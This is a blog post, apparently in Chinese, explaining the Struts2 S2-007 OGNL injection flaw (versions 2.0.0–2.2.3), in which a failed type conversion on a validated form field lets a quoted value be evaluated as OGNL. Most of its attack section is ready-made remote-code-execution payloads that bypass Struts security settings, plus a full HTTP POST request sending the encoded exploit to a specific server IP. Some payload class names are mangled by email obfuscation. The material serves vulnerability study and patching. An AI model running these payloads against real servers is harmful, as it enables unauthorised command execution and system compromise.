影响版本: 2.0.0 – 2.2.3 

当配置了验证规则 <ActionName>-validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction:

(...)
public class UserAction extends ActionSupport {
	private Integer age;
	private String name;
	private String email;

(...)

然后配置有 UserAction-validation.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC
	"-//OpenSymphony Group//XWork Validator 1.0//EN"
	"http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators>
	<field name="age">
		<field-validator type="int">
			<param name="min">1</param>
			<param name="max">150</param>
		</field-validator>
	</field>
</validators>

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。

因为受影响版本为 Struts2 2.0.0 – Struts2 2.2.3,所以这里给出绕过安全配置进行命令执行的 Payload(弹计算器,无法在本项目环境下运行):

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@[email protected]().exec("open /Applications/Calculator.app")) + '

任意代码的EXP:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@[email protected](@[email protected]().exec('id').getInputStream())) + '

将Exp传入可以利用的输入框(age),得到命令执行结果:

POST /user.action;jsessionid=1917DFBEB9876CA188EC7D440F1301C8 HTTP/1.1
Host: 188.40.189.134:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://188.40.189.134:8080
Connection: close
Referer: http://188.40.189.134:8080/
Cookie: ECS[visit_times]=2; lang=zh-CN; has_js=1; ECS_ID=7ad6d31398e1424ba25ada22c6a75360d8b9de91; i_like_gitea=fb9d9391b26c39d0; zbx_sessionid=9a280be3024b7e5dbb74b5fcd5f62d83; PHPSESSID=071iqkp4k4tierhdosl431ol90; redirect=1
Upgrade-Insecure-Requests: 1

name=admin&email=admin&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...